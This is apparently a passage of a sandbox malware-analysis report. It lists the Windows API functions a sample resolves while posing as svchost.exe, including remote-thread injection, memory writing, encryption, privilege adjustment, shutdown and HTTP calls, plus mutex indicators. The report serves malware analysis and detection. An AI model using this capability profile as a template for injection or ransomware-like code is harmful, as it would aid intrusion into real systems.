Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77cb0000	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x759d7a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x759d49d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x759d89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77cf1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x759e10b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x759d34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77cde026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x759d35b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x759ed9b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x759d2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77ce45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x759ddd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x759d14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x759d5a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x759fd4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x759d103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x759d170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x759d1400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x759d5a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x759ed9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x759fd075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x759ed5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x759d5151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x759ece2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x759d17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x759d469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x759d1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x759d1b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x759d1ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x759d1886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x759d1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x77d2742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x759d7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x759d11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x759f830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x759d3e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x759d195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x759ed851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x759f5c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x759fc7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a5416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a5414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a541df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a540fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x759d5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x759d418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x759d44ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x759f3b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x759d1b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x759d17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77ce2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x759d465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x759d192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x759ed4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x759d1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x759d4407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x759d111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77cd2270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x759d4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x759eecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a544cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x759d1856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x759d4173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x759d1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x759d54ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77cd22b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x759d1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x759d4442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x759d15d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x759ed4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x759d11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x759d14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x759d4a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x759ed9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x759d59e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x759d4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x759d1462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x759ec860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x759d3ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x759d4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x759d34c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x759d34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x759d1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x759d492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x759f8baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x759f896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x759d11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x759f735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x759d3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x759d424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x759d16dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x759d1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x759d16c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x759d10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x759d183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x759d1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x759d4220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x759d110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x759d186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x758e49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x758e8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x758dfbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x758e1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77ce25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x758d8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x758d9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x758e2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x758e3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75931a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x758d7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x758e05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x758d787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x758db17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x758e6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x758dd156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x758df350	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x758d9a55	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x76256c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x7624d718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x7775469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x777545f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7776779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x77750e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x777540e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x77750e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x77752a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x777540fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x7774c54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x77749fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x7774f4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x7774df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x7774df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x77754680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x777514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x7774df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x77754304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x7775412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x77754620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7775468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x7774c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x7775432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x777546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7774e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x7775431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x7774c51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x7775418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x7775415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x77754608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x777541b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x7775413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x7774cf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7776773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x7774e15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x777546e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x7775445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7779db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7774df14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76a83c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76a91e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76af5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x763845bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x763855bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x763acd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x76384745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x763ad32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x763846e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x763886f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x7638c39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76383248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x7638c177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x763b066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x76385331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x7639fbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7638a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x7637fcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x7639edfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x7637ff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x76385c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x7639c6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x763ace21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x75ad13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x75afe599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x75b209ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x75b0363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75af5ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75b29d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75b286d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x76965689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x76964de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7696e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x769654f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x76964f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x76965f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x76965ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x769658b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x75f449e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75f3b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x75f3a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75f31b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75f44c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x75f2d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x75f375e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75f4f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75f3ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x75fb18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x766c1d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x761b3eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x7582a415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQuerySystemInformation, address_out = 0x77ccfda0	1	Fn

System (277)

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	2	Fn
Get Info	type = Operating System	127	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	74	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	74	Fn

Mutex (6)

Operation	Additional Information	Count	Logfile
Create	mutex_name = 20BC29E135FB9B01285187E3B5593CC8	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn